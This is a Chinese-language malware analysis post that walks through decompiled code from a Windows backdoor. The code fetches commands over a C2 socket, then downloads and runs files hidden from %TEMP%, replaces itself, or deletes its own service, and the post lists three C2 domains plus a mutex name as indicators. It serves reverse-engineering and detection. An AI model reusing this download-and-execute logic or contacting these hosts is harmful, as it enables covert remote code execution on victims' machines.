序言
接着上回的分析, 分析另外三个重要函数,这三个函数除了域名不一样, 没什么太大差别, 所以只分析一个即可.
StartAddress
-
- 获取函数
// Resolve the Win32 APIs used below at run time through LoadLibraryA/GetProcAddress
// instead of the static import table (a common way to keep them out of import scans).
v0 = LoadLibraryA("kernel32.dll");
GetProcAddress(v0, &ProcName); // return value discarded; ProcName is defined outside this excerpt
v1 = LoadLibraryA("kernel32.dll");
GetTempPathA = GetProcAddress(v1, "GetTempPathA");
v2 = LoadLibraryA("WS2_32.dll");
closesocket = GetProcAddress(v2, "closesocket");
v3 = LoadLibraryA("KERNEL32.dll");
lstrcatA = GetProcAddress(v3, "lstrcatA");
result = sub_404044(); // the C2 domain for this variant is sbcq.f3322.org; returns a socket object
-
0x4060F0
获取系统信息
...
// OS fingerprinting: v87/v88 look like major/minor version numbers and v90 a product-type
// byte (TODO confirm against the OSVERSIONINFOEX fill-in, which is outside this excerpt).
// A short label is copied to a1+4 and dword_401B74 is set to 1 for the server editions
// (2000, 2003, 2008) and 0 for the workstation editions (NT, XP, Vista).
if ( v87 <= 4 )
{
dword_401B74 = 0;
strcpy((char *)(a1 + 4), &Source); // "NT"
}
if ( v87 == 5 && !v88 )
{
dword_401B74 = 1;
strcpy((char *)(a1 + 4), &v92); // "2000"
}
if ( v87 == 5 && v88 == 1 )
{
dword_401B74 = 0;
strcpy((char *)(a1 + 4), &v45); // "XP"
}
if ( v87 == 5 && v88 == 2 )
{
dword_401B74 = 1;
strcpy((char *)(a1 + 4), &v60); // "2003"
}
if ( v87 == 6 && !v88 )
{
if ( (unsigned __int8)v90 == 1 ) // presumably VER_NT_WORKSTATION; verify in the caller
{
dword_401B74 = 0;
strcpy((char *)(a1 + 4), &v98); // "Vista"
}
else
{
dword_401B74 = 1;
strcpy((char *)(a1 + 4), &v48); // "2008"
}
}
...
-
- 获取目标文件下载地址
// Two-stage receive from the C2 socket: an 8-byte header into buf, then *(int *)buf
// more bytes into Parameters (the download URL). The length comes straight from the
// network; the enclosing loop that this break leaves is outside this excerpt.
if ( !sub_403758(socketObject, (int)buf, 8) || !sub_403758(socketObject, (int)Parameters, *(int *)buf) )// the download URL is stored in Parameters
break;
-
- 指令
0x10
- 指令
// Command 0x10/0x11: download a file from the URL in Parameters into %TEMP% and run it.
// The enclosing switch starts and ends outside this excerpt.
case 0x10u:
CmdLine = 0;
memset(&v25, 0, 0x100u);
v26 = 0;
v27 = 0;
v32 = 0;
memset(&v33, 0, 0x7Cu);
v34 = 0;
v35 = 0;
GetTempPathA(0x104, &CmdLine);
v17 = GetTickCount();
wsprintfA(&v32, "%d", v17); // file name = current tick count (decimal), no extension
lstrcatA(&CmdLine, &v32);
v18 = LoadLibraryA(&LibFileName); // LibFileName / v79 are resolved outside this excerpt
downloadFile = GetProcAddress(v18, &v79);
downloadFile(0, Parameters, &CmdLine, 10, 0); // Parameters is the remote URL, CmdLine the local path; return value unchecked
// HRESULT URLDownloadToFile(
// LPUNKNOWN pCaller,
// LPCTSTR szURL,
// LPCTSTR szFileName,
// _Reserved_ DWORD dwReserved,
// LPBINDSTATUSCALLBACK lpfnCB
// );
if ( v37 == 0x11 ) // v37 is the command byte: 0x11 runs visibly, 0x10 hidden
v20 = 5;
else
v20 = 0;
WinExec(&CmdLine, v20); // 0 - SW_HIDE, 5 - SW_SHOWNORMAL
break;
-
- 指令
0x12
- 指令
// Command 0x12: self-update. Downloads a replacement binary to %TEMP%\<5 random letters>cn.exe,
// removes the old service and its registry key, deletes the current file, runs the new one.
// "Ghijkl Nopqrstu Wxy" is reused as mutex name, service name and registry key name
// throughout this sample, which makes it a convenient host-based indicator.
v8 = OpenMutexA(0x1F0001u, 0, "Ghijkl Nopqrstu Wxy"); // 0x1F0001 = MUTEX_ALL_ACCESS
v9 = v8;
if ( v8 ){
ReleaseMutex(v8);
CloseHandle(v9);
}
Dest = 0;
memset(&v47, 0, 0x100u);
v48 = 0;
v49 = 0;
v28 = 0;
memset(&v29, 0, 0x7Cu);
v30 = 0;
v31 = 0;
GetTempPathA(0x104, &Dest);
// sub_406C30(0x1A) presumably yields 0..25; adding 'a' gives a lowercase letter.
Size = sub_406C30(0x1Au) + 'a';
v11 = sub_406C30(0x1Au) + 'a';
v12 = sub_406C30(0x1Au) + 'a';
v13 = sub_406C30(0x1Au) + 'a';
v14 = sub_406C30(0x1Au);
wsprintfA(&v28, "%c%c%c%c%ccn.exe", v14 + 'a', v13, v12, v11, Size); // random file name in the temp folder, fixed "cn.exe" suffix
lstrcatA(&Dest, &v28);
v15 = LoadLibraryA(&LibFileName);
downloadFile = GetProcAddress(v15, &v79);
if ( !downloadFile(0, Parameters, &Dest, 10, 0)) // URLDownloadToFile returns S_OK (0) on success
{
sub_40351A("Ghijkl Nopqrstu Wxy"); // removes the service of that name if it exists
memset(&pszSubKey, 0, 0x104u);
v115 = "SYSTEM\\CurrentControlSet\\Services";
sprintf(&pszSubKey, "%s%s", &v115, "Ghijkl Nopqrstu Wxy"); // note: no separator between prefix and name here, unlike the 0x6 handler — possibly a transcription difference
SHDeleteKeyA(HKEY_LOCAL_MACHINE, &pszSubKey);// deletes the service's registry key (and any subkeys)
closesocket(socketObject);
deleteItSelf(); // remove the current executable
WinExec(&Dest, 0u); // start the freshly downloaded binary hidden (SW_HIDE)
ExitProcess(0u);
}
break;
-
0x14
// Command 0x14: open the URL in Parameters with Internet Explorer (a visible browser window).
// The enclosing switch starts outside this excerpt.
case 0x14u:
File = 'iexplore.exe'; // multi-character constants are a decompiler artefact for in-place string stores
Operation = 'open';
v7 = GetDesktopWindow();
ShellExecuteA(v7, &Operation, &File, Parameters, 0u, 1); // Parameters is a download URL; 1 = SW_SHOWNORMAL
break;
}
-
0x6
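// Command 0x6: uninstall. Same tear-down sequence as the 0x12 handler but without
// downloading or starting a replacement: release the mutex, remove the service and its
// registry key, close the C2 socket, delete the current file and exit.
v21 = OpenMutexA(0x1F0001u, 0, "Ghijkl Nopqrstu Wxy"); // 0x1F0001 = MUTEX_ALL_ACCESS
v22 = v21;
if ( v21 )
{
ReleaseMutex(v21);
CloseHandle(v22);
}
sub_40351A("Ghijkl Nopqrstu Wxy"); // remove the service
memset(&Dest, 0, 0x104u);
v115 = "SYSTEM\\CurrentControlSet\\Services\\"; // listing was missing the ';' here
sprintf(&Dest, "%s%s", &v115, "Ghijkl Nopqrstu Wxy");
SHDeleteKeyA(HKEY_LOCAL_MACHINE, &Dest); // deletes HKLM\SYSTEM\CurrentControlSet\Services\Ghijkl Nopqrstu Wxy and its subkeys
closesocket(socketObject);
deleteItSelf();
ExitProcess(0u);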
-
- 其他指令
// Remaining commands: each copies configuration received from the C2 (Parameters,
// String2 and the neighbouring v39..v45 fields) into globals, then calls a handler.
switch ( v37 )
{
case 2u:
lstrcpynA(Parameter, String2, 0x104);
dword_409374 = *(_DWORD *)Parameters;
dword_40937C = v40;
dword_409378 = v39;
dword_409380 = v41;
sub_403135(Parameter); // not useful for the analysis (per the author)
break;
case 3u:
dword_409240 = *(_DWORD *)Parameters;
dword_409248 = v40;
dword_409244 = v39;
dword_409254 = v41;
dword_40924C = *(_DWORD *)String2;
dword_409250 = v43;
lstrcpynA(byte_409140, &v44, 0x80);
v6 = lstrlenA(byte_409140);
lstrcpynA(byte_4091C0, &v45[v6], 0x80); // second string follows the first inside v45
sub_403280(byte_409140); // builds a request header
break;
case 4u:
lstrcpynA(String, String2, 0x80);
v5 = lstrlenA(String);
lstrcpynA(String1, &String2[v5 + 1], 0x200); // second NUL-separated string in String2
dword_409608 = *(_DWORD *)Parameters;
dword_409610 = v40;
dword_40960C = v39;
dword_409614 = v41;
sub_403311(String); // not useful for the analysis (per the author)
break;
case 5u:
dword_401C84 = 1; // flag only; consumed elsewhere
break;
}
域名
www.520123.xyz sbcq.f3322.org www.520520520.org
多说一点
吾爱破解上面有好几个这样的分析,可能最后释放的那个
DLL
功能不一样, 下面贴一下链接